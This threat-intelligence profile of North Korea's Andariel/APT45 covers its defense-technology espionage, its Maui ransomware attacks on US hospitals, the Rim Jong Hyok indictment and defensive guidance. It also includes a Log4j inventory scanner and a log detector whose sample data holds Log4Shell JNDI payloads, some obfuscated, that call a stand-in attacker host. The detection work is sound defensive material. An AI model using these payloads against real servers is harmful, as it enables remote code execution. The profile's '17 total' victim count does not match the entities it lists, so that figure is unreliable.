Andariel / APT45
One of North Korea's longest-running cyber units, operating since at least 2009 and elevated to formal APT status (APT45) by Mandiant in July 2024. Andariel pursues two missions simultaneously: stealing classified military and nuclear technology from defense, aerospace, and engineering targets across the US, South Korea, Japan, and India — and funding those operations by running ransomware attacks against US healthcare providers. Mandiant's principal analyst Michael Barnhart distilled the unit's primary function precisely: "When Kim Jong Un demands better missiles, these are the guys who steal the blueprints for him." DOJ indicted Rim Jong Hyok in July 2024 for his role in the Maui ransomware hospital attacks and the downstream espionage operations those funds enabled.
Overview
Andariel / APT45 is the North Korean state's dedicated military technology acquisition unit — an organization whose operational purpose is to supply the technical intelligence needed to advance North Korea's weapons programs by stealing it from the organizations that developed it. While APT38 / BeagleBoyz is tasked with generating revenue through financial theft, and APT37 / ScarCruft is tasked with domestic political surveillance, Andariel's mission is framed by Mandiant in explicitly military terms: it answers Kim Jong Un's requirement for better missiles, better tanks, better radar systems, better anti-aircraft weapons — by stealing the blueprints, specifications, engineering documents, and design drawings from the institutions that built them.
The group has been operational since at least 2009, making it one of North Korea's oldest continuously operating cyber units. Its early work consisted of destructive attacks against South Korean organizations and classic espionage against government and defense targets. Over more than fifteen years, it has evolved through multiple phases — expanding from South Korean targets to US, Japanese, and Indian defense and nuclear facilities, adding a financially motivated ransomware component to fund its espionage operations, and most recently targeting healthcare and crop science sectors in ways that reflect the DPRK's own domestic priorities.
Mandiant's elevation of Andariel to APT45 status in July 2024 coincided with a coordinated advisory from the FBI, CISA, NSA, US Cyber Command, the UK's NCSC, and allied agencies — explicitly documenting the group's focus on stealing nuclear technology, anti-aircraft specifications, missile system data, and broader military intellectual property. The same week, the DOJ indicted Rim Jong Hyok for the Maui ransomware healthcare attacks — the operation by which Andariel funds its espionage activities. The combination of simultaneous espionage and ransomware missions on the same infrastructure, against the same victims, in the same day, is documented in the CISA advisory as a confirmed operational pattern.
Andariel is unusual among the actors in this series because it runs two completely different operations using the same infrastructure and personnel: (1) long-duration espionage to steal military and nuclear technology for Pyongyang's weapons programs, and (2) short-duration ransomware attacks against US hospitals to generate the cryptocurrency needed to pay for the infrastructure and tools used in mission (1). These missions are not sequential — CISA documented that Andariel has conducted both on the same day against the same victim. The money from ransomware hospital attacks buys VPS servers, tools, and operational infrastructure. Those servers and infrastructure are then used to exfiltrate classified defense technology. A hospital in Kansas is simultaneously funding and enabling the theft of US Air Force technical specifications.
The Espionage Mission: What Andariel Steals
The CISA/FBI/NSA July 2024 joint advisory provided the most detailed public accounting of Andariel's actual intelligence collection requirements — the categories of technical information Pyongyang has specifically tasked the group to acquire.
- Contract specifications and bills of materials for defense systems — the detailed component lists and engineering specifications for weapons platforms, covering both what a system is made of and how those components interact.
- Project details and design drawings — engineering drawings, CAD files, technical specifications, and design documentation for military equipment including heavy and light tanks, self-propelled howitzers, light strike vehicles, ammunition supply vehicles, infantry fighting vehicles, and associated systems.
- Missile and missile defense systems — technical data on missile guidance systems, propulsion, warheads, and counter-missile platforms, including radar system specifications relevant to missile defense.
- Nuclear program data — information stored in government nuclear research facilities and nuclear power plants, including uranium processing and enrichment data, nuclear power plant configurations, and nuclear weapons research documentation. The Dtrack backdoor's deployment at India's Kudankulam Nuclear Power Plant in 2019 is the documented operational example — one of the few confirmed instances of North Korean operators accessing nuclear power plant infrastructure.
- Drone and autonomous system specifications — technical data on unmanned aerial vehicles, their guidance systems, and drone defense technologies.
- Anti-aircraft weapon systems — the Seoul Metropolitan Police specifically attributed theft of anti-aircraft weapon system specifications from South Korean companies to APT45 in December 2023.
- Healthcare and pharmaceutical research — Mandiant notes that Andariel continued targeting healthcare and pharmaceutical companies after other DPRK groups pivoted away, suggesting an ongoing mandate. This may reflect collection requirements for North Korea's domestic health system or for understanding vaccine and treatment technologies relevant to the country's isolated population.
- Crop science research — the 2020 targeting of a multinational corporation's crop science division is assessed as related to North Korea's agricultural crisis, suggesting Andariel's collection requirements extend to any technology that addresses the regime's domestic vulnerabilities.
The specific intelligence value of these targets is direct and immediate: North Korea's weapons programs do not develop in isolation. Every missile test, every artillery system, every nuclear advance draws on technical data acquired by units like Andariel from the countries it targets. The Mandiant assessment that "many advances in North Korea's military capabilities in recent years can directly be attributed to APT45's successful espionage efforts" is a statement with specific geopolitical weight — these are not hypothetical future threats but documented contributions to the DPRK's existing weapons capability.
Ransomware as Operational Funding
Andariel's model of using ransomware attacks against US healthcare providers to fund its espionage infrastructure represents a distinct operational structure unique among documented APT groups — a state-sponsored espionage unit self-financing its operations through cybercrime against civilian medical institutions.
- The Mechanism: Andariel operators compromise US healthcare organizations using Log4Shell (CVE-2021-44228) and similar vulnerabilities to gain initial access, deploy Maui ransomware to encrypt systems used for medical testing, electronic records, and patient care, and demand Bitcoin ransom payments. The encrypted hospital systems prevent patients from receiving timely care — a documented patient safety consequence explicitly acknowledged in the DOJ's characterization of the Rim Jong Hyok indictment. When victims pay, the cryptocurrency is laundered through Hong Kong-based facilitators, converted to Chinese yuan, and withdrawn from ATMs in China near the Sino-Korean Friendship Bridge between Dandong and Sinuiju — a laundering route that physically crosses the border into North Korea. The resulting funds purchase VPS infrastructure used in subsequent defense sector espionage operations.
- Scale: The Rim Jong Hyok indictment documented Andariel targeting five US healthcare providers, four US defense contractors, two US Air Force bases, and NASA's Office of Inspector General — all using infrastructure purchased with hospital ransom proceeds. In a single documented case, a November 2022 cyber attack on a US defense contractor resulted in the exfiltration of more than 30 gigabytes of technical data. The ransomware and espionage infrastructure were directly connected: the VPS servers bought with ransom payments hosted the C2 infrastructure for the defense contractor intrusions.
- Maui Ransomware: Maui is a ransomware strain that Andariel operators manually execute on victim systems rather than deploying as a self-propagating worm — requiring an active operator presence in the victim network. CISA first documented Maui in a July 2022 advisory after multiple healthcare providers were attacked. Maui encrypts targeted files using AES-128, RSA-2048, and XOR encryption. Unlike criminal ransomware that broadcasts ransom demands, Maui targets specific files identified by operators during the manual execution phase, reflecting the operator's prior knowledge of the victim's network from the initial Log4Shell intrusion phase.
- Simultaneous Operations: CISA's advisory explicitly documented that Andariel has launched ransomware attacks and conducted cyber espionage operations on the same day against the same entity — using the same compromised infrastructure for both ransom extortion and technical data exfiltration. This blurring of criminal and espionage activity within a single operation represents an unusual organizational model that creates specific legal and attribution challenges for responding agencies.
Known Campaigns
Andariel deployed the Dtrack backdoor (also known as Valefor and Preft) against India's Kudankulam Nuclear Power Plant — one of the few publicly confirmed instances of North Korean cyber operators successfully accessing nuclear power plant infrastructure. Kudankulam, a Russian-built plant in Tamil Nadu, India, had its administrative network compromised. Indian authorities initially denied the breach before later confirming it after Kaspersky identified Dtrack in the wild connected to the plant's network. The targeting of nuclear power plant infrastructure is consistent with Andariel's documented collection mandate for nuclear technology data — specifically plant configurations, operational procedures, and infrastructure documentation relevant to North Korea's own nuclear program development.
From May 2021 through at least April 2023, Rim Jong Hyok and Andariel co-conspirators used Maui ransomware and the Log4Shell vulnerability to attack US hospitals and healthcare providers, encrypting files used for medical testing and electronic patient records and demanding Bitcoin ransoms. Documented victims include five healthcare providers, four US defense contractors, two US Air Force bases, and NASA-OIG. A Kansas hospital was specifically identified in the Rim Jong Hyok warrant as a target. The FBI, working with NASA-OIG's Cyber Crimes Division, traced the operation by retracing attacker commands on compromised systems, identifying a password that unlocked the encrypted files the hackers used to stage exfiltrated data. Ransom proceeds were laundered through Hong Kong facilitators and ATMs near the China-North Korea border. US cybersecurity firm Mandiant noted that upon seeing the success of ransomware attacks against medical entities by other groups, APT45 began using similar off-the-shelf ransomware — demanding ransom amounts consistent with typical criminal ransomware incidents regardless of victim size.
South Korea's government warned in April 2024 that Andariel spent the majority of 2022 and 2023 infiltrating the networks of 83 South Korean defense companies or their contractors — an extraordinary sustained campaign against the South Korean defense industrial base. Companies targeted produced or contracted for systems including anti-aircraft weapon platforms, armored vehicles, and artillery systems. The Seoul Metropolitan Police specifically accused APT45 in December 2023 of stealing sensitive specifications for South Korean anti-aircraft weapon systems as part of this campaign. The scale — 83 organizations over two years — reflects a systematic effort to map and penetrate the entire South Korean defense manufacturing supply chain rather than targeting individual high-value organizations opportunistically.
Using infrastructure purchased with Maui ransomware proceeds, Andariel successfully breached two US Air Force bases and NASA's Office of Inspector General. The Air Force intrusions were specifically aimed at accessing technical data on aerospace systems — consistent with Andariel's documented collection requirements for drone and aircraft technology. The NASA-OIG compromise was investigated by NASA's own Cyber Crimes Division, whose analysis of attacker commands on compromised systems contributed to the identification and July 2024 indictment of Rim Jong Hyok. These intrusions represent Andariel's direct targeting of US government military and space technology infrastructure — not South Korean or allied-country targets but the United States itself.
Andariel targeted the crop science division of an unnamed multinational corporation in 2020 — an unusual targeting choice for a military espionage unit that Mandiant assesses as likely reflecting North Korea's acute agricultural crisis. North Korea closed its borders in early 2020 due to the COVID-19 pandemic, eliminating cross-border food trade and significantly exacerbating the country's food security situation. The targeting of crop science intellectual property — potentially including high-yield seed varieties, fertilizer technology, or agricultural management systems — suggests Andariel's collection requirements are responsive to the regime's domestic vulnerabilities as well as its weapons programs.
Tactics, Techniques & Procedures
| MITRE ID | Technique | Description |
|---|---|---|
| T1190 | Exploit Public-Facing Application — Log4Shell | The documented primary initial access technique in Andariel's dual ransomware-espionage operations is exploitation of CVE-2021-44228 (Log4Shell) — a critical remote code execution vulnerability in the widely used Apache Log4j logging library. CISA's advisory and the Rim Jong Hyok indictment both specifically cite Log4Shell as the initial access vector for hospital and defense contractor intrusions. From late 2021 through 2023, Andariel used Log4Shell to compromise web servers, deploy web shells for persistent access, and then pivot into internal networks for both ransomware deployment and technical data exfiltration. The vulnerability's prevalence — Log4j is embedded in countless enterprise Java applications — gave Andariel broad access to targets across healthcare, defense, and government sectors from a single exploit. |
| T1505.003 | Web Shell — Post-Exploitation Persistence | After gaining initial access via Log4Shell or other public-facing application exploitation, Andariel deploys web shells to maintain persistent access to compromised servers. The web shell provides a stable reentry point to the victim's network that persists even if the initial Log4Shell-exploited application is patched. CISA documented that Andariel deploys web shells specifically to "gain access to sensitive information and applications for further exploitation" — using the web shell as both a persistence mechanism and a staging point for lateral movement toward the internal network segments containing the target data. |
| T1003 | Credential Dumping — Mimikatz and Common Tools | After establishing web shell access, Andariel escalates privileges and moves laterally using common credential dumping tools including Mimikatz. CISA's advisory documents this as part of the standard post-exploitation pattern: initial access via Log4Shell, web shell deployment, then privilege escalation via credential dumping tools to obtain domain administrator credentials, followed by lateral movement to reach both the data targeted for espionage exfiltration and the systems targeted for ransomware encryption. The use of commodity tools like Mimikatz alongside custom malware like Maui and Dtrack reflects a mixed toolkit approach where off-the-shelf tools handle standard intrusion tasks and custom tools handle the specialized missions. |
| T1486 | Data Encrypted for Impact — Maui Ransomware | Maui ransomware is deployed via manual operator execution after establishing network access — distinguishing it from self-propagating criminal ransomware. Operators identify and specifically target files used for medical testing systems and electronic health records before executing Maui's encryption. The manual deployment approach means operators have already mapped the victim's network and identified the highest-value files for encryption before the ransom demand is created. Maui uses a combination of AES-128, RSA-2048, and XOR encryption. Unlike criminal ransomware with automated propagation, each Maui deployment is an active operator decision — reflecting the espionage-style operational patience characteristic of Andariel's culture. |
| T1041 | Exfiltration — Defense Technical Data Collection | The espionage mission executes data exfiltration of technical documents including contract specifications, bills of materials, design drawings, engineering documents, and project details from defense and nuclear organizations. The CISA advisory documents that the information collected "has military and civilian applications" and directly contributes to DPRK's weapons programs. A single documented November 2022 defense contractor intrusion resulted in over 30 gigabytes of data exfiltration. Data is exfiltrated through VPS servers purchased with ransomware proceeds — creating a direct financial link between the healthcare ransomware operations and the defense espionage infrastructure. |
| T1027 | Obfuscated Files — Custom Encoding and Code Reuse | Andariel malware exhibits a distinct genealogy of code reuse, custom encoding, and unique passwords across tool families — a pattern Mandiant uses as a key attribution indicator to distinguish APT45 from other DPRK-nexus groups. Microsoft's advisory on Onyx Sleet documents the group as "constantly evolving its toolset to add new functionality and implement novel ways to bypass detection" while maintaining a "fairly uniform attack pattern." The combination of evolving detection evasion with stable underlying attack patterns creates a recognizable operational fingerprint despite ongoing tool updates. |
| T1583.003 | Acquire Infrastructure — Ransom-Funded VPS Procurement | The documented financial model: hospital ransom proceeds are laundered through Hong Kong facilitators, converted to yuan, and withdrawn from ATMs near the Sino-Korean Friendship Bridge. The resulting funds purchase virtual private servers that serve as C2 infrastructure for subsequent defense sector espionage operations. This creates a traceable financial chain — from hospital Bitcoin payment to VPS server purchase to Air Force base intrusion — that the DOJ and FBI specifically documented in the Rim Jong Hyok indictment and that gave investigators the evidentiary thread connecting the ransomware operations to the defense espionage campaigns. |
DOJ Indictment — Rim Jong Hyok
On July 25, 2024, a grand jury in Kansas City, Kansas returned an indictment against Rim Jong Hyok, a North Korean national and Andariel unit member, for his role in the conspiracy to hack US hospitals, extort ransoms, launder the proceeds, and use those proceeds to fund espionage operations against US government and defense targets.
- Charges and sentencing exposure: Conspiracy to commit computer hacking (maximum 5 years) and conspiracy to commit money laundering (maximum 20 years) — a combined maximum exposure of 25 years. The indictment specifically frames the ransomware extortion and the downstream espionage as a single conspiracy with two operational phases rather than two separate criminal activities.
- Documented victims — 17 total: Five US healthcare providers (including a Kansas hospital, and providers in Arkansas, Florida, Colorado, and Connecticut), four US defense contractors, two US Air Force bases (Randolph Air Force Base, Texas and Robins Air Force Base, Georgia), and NASA's Office of Inspector General. Total: 17 identified victims across 11 US states plus additional entities in Taiwan, South Korea, and China.
- NASA intrusion specifics: Rim and co-conspirators had access to NASA's computer systems for more than three months, extracting over 17 gigabytes of unclassified data during that period. The NASA-OIG's own Cyber Crimes Division contributed forensic analysis to the investigation.
- The laundering chain: Rim and co-conspirators laundered ransom payments through Hong Kong-based facilitators who converted cryptocurrency to Chinese yuan. The yuan was then accessed from ATMs in China in the immediate vicinity of the Sino-Korean Friendship Bridge — a laundering route that the indictment describes as leaving a physical trail within meters of the North Korean border. In at least one case, laundered funds were used to purchase VPS servers that were then used to exfiltrate data from defense contractor networks.
- Status and reward: Rim Jong Hyok is not in US custody. A federal arrest warrant has been issued. The State Department's Rewards for Justice program offers up to $10 million for information leading to his identification or location — the same reward level offered for Bybit hacker attribution and APT38 defendants.
- Context — Song Kum Hyok (2025): In 2025, US Treasury sanctioned Song Kum Hyok, a 38-year-old North Korean national based in China's Jilin province, for involvement in both the APT45 organization and in North Korea's fraudulent IT worker scheme — connecting Andariel's technical operations to the DPRK's broader revenue-generation infrastructure of placing fake IT workers in Western companies.
Tools & Malware
- Dtrack (Valefor / Preft): A persistent backdoor that is Andariel's most documented custom espionage tool. Dtrack provides remote access, keylogging, screenshot capture, file system enumeration, and command execution. It was first publicly identified through its deployment at the Kudankulam Nuclear Power Plant in 2019. Dtrack is strongly associated with APT45 attribution — it forms part of the distinct malware genealogy that separates Andariel's toolkit from other North Korean groups. The backdoor has appeared across defense, nuclear, and research sector intrusions over multiple years.
- Maui Ransomware: Operator-executed ransomware used specifically against US healthcare providers to generate ransom proceeds. Maui uses AES-128, RSA-2048, and XOR encryption to encrypt victim files. It is deployed manually by operators who have already mapped the victim network — a characteristic that distinguishes it from criminal ransomware with automated propagation. CISA first documented Maui in a July 2022 advisory. Unlike most ransomware, Maui does not broadcast ransom demands automatically — operators manually communicate ransom demands to victims after deployment.
- SHATTEREDGLASS: A ransomware family documented by Kaspersky in June 2021, linked by Mandiant to suspected APT45 clusters. SHATTEREDGLASS has been used against entities in South Korea, Japan, and the US — predating the Maui ransomware campaign and suggesting Andariel's ransomware development began before the more widely documented Maui operations.
- TigerRAT: A backdoor used for information theft and command execution, including keylogging and screen recording directed from the C2 server. Documented by Microsoft in its Onyx Sleet analysis as part of the group's core toolset alongside Dtrack.
- ValidAlpha (Black RAT): A Go-based backdoor capable of running arbitrary files, listing directory contents, downloading files, taking screenshots, and launching shell access for arbitrary command execution. Documented by Microsoft alongside TigerRAT as part of the Onyx Sleet toolkit.
- 3PROXY: A publicly available proxy tool used in APT45 operations for tunneling traffic through compromised systems — consistent with Mandiant's documentation of the group using a mix of public tools, modified tools, and custom malware.
- ROGUEEYE: A backdoor based on modified publicly available malware, documented by Mandiant as part of APT45's arsenal. The modification-of-public-tools approach appears consistently across APT45's toolkit alongside fully custom tools like Dtrack.
- Web Shells: Post-exploitation web shells deployed after initial Log4Shell access, providing persistent access to compromised servers. Used as staging points for lateral movement into internal network segments.
Indicators of Compromise
IOCs from CISA joint advisory AA24-207A (July 2024), the Rim Jong Hyok DOJ indictment, CISA Maui ransomware advisory (2022), Microsoft Onyx Sleet advisory, and Mandiant APT45 research. The CISA advisory includes a VirusTotal collection of APT45-related indicators. Full IOC tables including file hashes, domains, and IP addresses are in the advisories linked in Sources.
Mitigation & Defense
Andariel's dual-mission model creates two distinct defensive contexts with different urgencies: healthcare organizations face ransomware that disrupts patient care, while defense, aerospace, nuclear, and engineering organizations face technical data theft that contributes to weapons program advancement. Both require active defensive measures.
- Patch Log4j Completely — Everywhere: The Log4Shell vulnerability (CVE-2021-44228) is Andariel's documented primary initial access vector across both its healthcare ransomware and defense espionage operations. Three years after the vulnerability's disclosure, unpatched Log4j instances remain in enterprise environments embedded in third-party applications, legacy systems, and vendor software where direct patching is not straightforward. Conduct a comprehensive Log4j asset inventory using available scanning tools — not just searching for obvious Log4j jar files but examining all Java applications and container images for any version of Log4j in their dependency chain. Unpatched Log4j on any internet-facing system is a confirmed Andariel access vector that must be remediated or isolated.
- Healthcare Sector — Maui Ransomware Detection: Maui is operator-executed rather than auto-propagating, meaning it appears on victim systems only after an operator has already achieved network access and mapped the environment. Detection must occur before Maui execution — not by detecting Maui itself but by detecting the precursor compromise indicators: web shell deployment on Log4j-vulnerable servers, credential dumping with Mimikatz, and lateral movement toward systems hosting medical testing and EHR data. CISA's Maui advisory (2022) provides specific detection signatures. Any healthcare organization that identifies Log4j exploitation on its web servers should treat this as a potential Andariel intrusion requiring immediate incident response rather than a standalone vulnerability patching event.
- Defense and Nuclear Sector — Technical Data Protection: Andariel's specific collection requirements — contract specifications, design drawings, bills of materials, engineering documents — are well-documented. Implement data loss prevention controls specifically tuned to detect bulk access or exfiltration of these document types from engineering and project management systems. Apply need-to-know access controls to sensitive technical documents — users should not have access to specifications for weapons systems they are not currently working on. Network segmentation between general corporate IT and engineering workstations that hold classified or sensitive technical data limits lateral movement toward the target documents even after initial access is achieved.
- Segment Nuclear Infrastructure from IT Networks: The Kudankulam Nuclear Power Plant compromise occurred via the administrative network — not the plant control network — but still gave Andariel access to infrastructure documentation. Nuclear facilities and other critical infrastructure organizations should maintain hard network segmentation between administrative/corporate IT networks and operational technology networks, with no direct connectivity. Any data transfer between IT and OT environments should require explicit authorization and monitoring.
- Post-Compromise Detection for Long-Dwell Espionage: Andariel's espionage operations involve extended network presence for data collection and exfiltration — not a quick ransomware-and-exit pattern. Proactive threat hunting in defense and nuclear sector networks, specifically looking for Dtrack backdoor indicators, unusual outbound connections from workstations handling sensitive technical documents, and anomalous authentication patterns on engineering data repositories, can detect Andariel intrusions before the exfiltration phase completes. Engagement with sector-specific ISACs (Defense-ISAC, Nuclear Energy ISAC) for sharing Andariel-specific indicators is a recommended practice in the CISA advisory.
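The Log4j inventory step above, as an added example that is not part of this profile or of any cited advisory: it opens every jar/war/ear under a directory, recurses into archives nested inside them in memory, reads the log4j-core version from its Maven metadata, and reports whether CVE-2021-44228 applies (including the case where the JndiLookup class was deleted as a stop-gap). The WAR it scans is constructed inline; the version boundaries are those published for the CVE.

```python
"""Log4j dependency inventory: walks a directory, opens every .jar/.war/.ear,
recurses into archives nested inside them (in memory), and reports each bundled
log4j-core with its version and CVE-2021-44228 status. Added example; not vendor code."""
import io
import os
import re
import zipfile

ARCHIVE_EXTS = (".jar", ".war", ".ear", ".zip")
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"  # the JNDI lookup
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def leading_int(part):
    """Numeric prefix of a version component ('0-beta9' -> 0, '14' -> 14)."""
    m = re.match(r"\d+", part)
    return int(m.group()) if m else 0


def parse_version(pom_text):
    """(major, minor, patch) from pom.properties, or None if no version line."""
    for line in pom_text.splitlines():
        if line.startswith("version="):
            nums = [leading_int(p) for p in line[8:].strip().split(".")[:3]]
            return tuple(nums + [0] * (3 - len(nums)))
    return None


def is_vulnerable(version):
    """CVE-2021-44228: log4j-core 2.0-beta9 through 2.14.1, except the 2.12.2
    backport; 2.15.0 onward is not affected (still upgrade to current 2.x)."""
    if version is None:
        return True  # no metadata: treat as affected until proven otherwise
    major, minor, patch = version
    if major != 2 or (minor == 12 and patch >= 2):
        return False  # 1.x is out of scope for this CVE; 2.12.2+ is fixed
    return minor < 15


def scan_archive(data, path, findings):
    """Inspect one archive held in memory; recurse into nested archives."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return  # not a zip container (or corrupt): nothing to inventory
    with zf:
        names = zf.namelist()
        has_jndi = JNDI_CLASS in names
        if has_jndi or POM_PROPS in names:
            version = None
            if POM_PROPS in names:
                version = parse_version(zf.read(POM_PROPS).decode("utf-8", "replace"))
            # An old version whose JndiLookup.class was deleted (the 2021 stop-gap) is not exploitable.
            findings.append({"path": path, "version": version, "jndi_lookup_present": has_jndi,
                             "vulnerable": has_jndi and is_vulnerable(version)})
        for name in names:
            if name.lower().endswith(ARCHIVE_EXTS):
                scan_archive(zf.read(name), path + "!/" + name, findings)


def scan_tree(root):
    """Walk a directory tree and inventory every archive found in it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(ARCHIVE_EXTS):
                full = os.path.join(dirpath, fn)
                with open(full, "rb") as fh:
                    scan_archive(fh.read(), full, findings)
    return findings


def build_sample_war():
    """Constructed sample: a WAR bundling a vulnerable log4j-core, a fixed one,
    and an old one with JndiLookup.class stripped out."""
    def log4j_jar(version, with_jndi):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as z:
            z.writestr(POM_PROPS, "artifactId=log4j-core\nversion=%s\n" % version)
            if with_jndi:
                z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder class bytes
        return buf.getvalue()
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as z:
        z.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", log4j_jar("2.14.1", True))
        z.writestr("WEB-INF/lib/log4j-core-2.17.1.jar", log4j_jar("2.17.1", True))
        z.writestr("WEB-INF/lib/log4j-core-2.13.3-stripped.jar", log4j_jar("2.13.3", False))
    return war.getvalue()


def demo():
    """Scan the constructed WAR as if it were app.war on disk."""
    findings = []
    scan_archive(build_sample_war(), "app.war", findings)
    return findings
```

On a real host, `scan_tree("/opt")` (or a mounted container image root) returns the same finding dicts for every archive under that path.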
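Detecting Log4Shell exploitation attempts in web server access logs, the precursor signal the healthcare bullet above says to act on, as an added example that is not from the CISA advisories: it URL-decodes each request field and collapses the nested lookup forms Log4j itself resolves before looking for the JNDI pattern, then reports source, field and callback host. The log lines and addresses are constructed (documentation ranges).

```python
"""Detection of Log4Shell (CVE-2021-44228) exploitation attempts in web server
access logs. Added example for this profile, not from the CISA advisory."""
import re
from urllib.parse import unquote

# Apache/nginx combined log format.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
                    r'(?P<status>\d+) \S+ "(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"')
# Lookup forms Log4j evaluates before the JNDI lookup runs; each resolves to its argument.
LOOKUP_FORMS = [
    re.compile(r"\$\{lower:([^${}]*)\}"),
    re.compile(r"\$\{upper:([^${}]*)\}"),
    re.compile(r"\$\{[^${}]*:-([^${}]*)\}"),  # ${name:-default} with an undefined name
]
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+)://([^/}\s]+)")

# Constructed sample log; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Dec/2021:03:14:07 +0000] "GET /api/login HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.77:1389/x}"
203.0.113.9 - - [12/Dec/2021:03:15:22 +0000] "GET /%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.77%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"
198.51.100.4 - - [12/Dec/2021:03:16:01 +0000] "GET /health HTTP/1.1" 200 2 "-" "Mozilla/5.0"
203.0.113.12 - - [12/Dec/2021:03:17:45 +0000] "GET / HTTP/1.1" 200 1024 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.77/b}"
"""


def normalise(value):
    """URL-decode (twice, for double encoding) and resolve nested lookups inner-first."""
    value = unquote(unquote(value))
    previous = None
    while previous != value:
        previous = value
        for form in LOOKUP_FORMS:
            value = form.sub(lambda m: m.group(1), value)
    return value.lower()


def inspect_line(line):
    """Return a finding for one access-log line, or None when nothing matches."""
    m = LOG_RE.match(line)
    if not m:
        return None
    for field in ("request", "referer", "user_agent"):
        hit = JNDI_RE.search(normalise(m.group(field)))
        if hit:
            return {"timestamp": m.group("ts"), "src_ip": m.group("ip"), "field": field,
                    "scheme": hit.group(1), "callback": hit.group(2)}
    return None


def scan_log(text):
    """Run the check over every line and return the findings in log order."""
    return [f for f in (inspect_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print("%(timestamp)s %(src_ip)s %(field)s -> %(scheme)s %(callback)s" % f)
```

A hit on an internet-facing Java application is the trigger the bullet describes: open an incident and hunt for web shells and credential dumping on that host rather than only scheduling a patch.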
Andariel's dual-mission model has a policy implication that extends beyond cybersecurity. When a hospital in Kansas pays a ransomware demand to restore access to its patient records, that payment — after laundering — funds the purchase of infrastructure used to exfiltrate US Air Force technical specifications and NASA research data. The hospital's decision to pay ransomware is not merely a business continuity choice; it is an inadvertent contribution to North Korea's weapons programs. This is not a hypothetical — it is the documented operational model that the DOJ indictment against Rim Jong Hyok made explicit in July 2024. The implication for healthcare sector cybersecurity investment is significant: improving healthcare organizations' defenses against initial compromise is not simply about protecting patient data or ensuring care continuity. It is about closing the funding pipeline that enables the theft of US defense technology. For the defense and nuclear sectors, the parallel implication is equally direct: Mandiant's assessment that North Korea's military capability advances can be directly attributed to APT45's espionage is a statement about what is at stake in defending engineering workstations and technical document repositories. The blueprints are the weapons.
Sources & Further Reading
Attribution and references used to build this profile.
- CISA/FBI/NSA/DC3/NCSC — North Korea Cyber Group Conducts Global Espionage Campaign (July 2024, foundational advisory)
- Mandiant / Google Cloud — APT45: North Korea's Digital Military Machine (July 25, 2024)
- US Department of Justice — North Korean Government Hacker Charged for Ransomware Attacks Targeting US Hospitals (July 2024)
- CISA — North Korean State-Sponsored Cyber Actors Use Maui Ransomware to Target Healthcare Sector (July 2022)
- NASA OIG — NASA Cybercrime Sleuths Aid Investigation to Expose North Korean Ransomware Scheme
- Recorded Future News — North Korean Hacking Group Targeted Weapons Blueprints, Nuclear Facilities (July 2024)
- MITRE ATT&CK — Group G0138: Andariel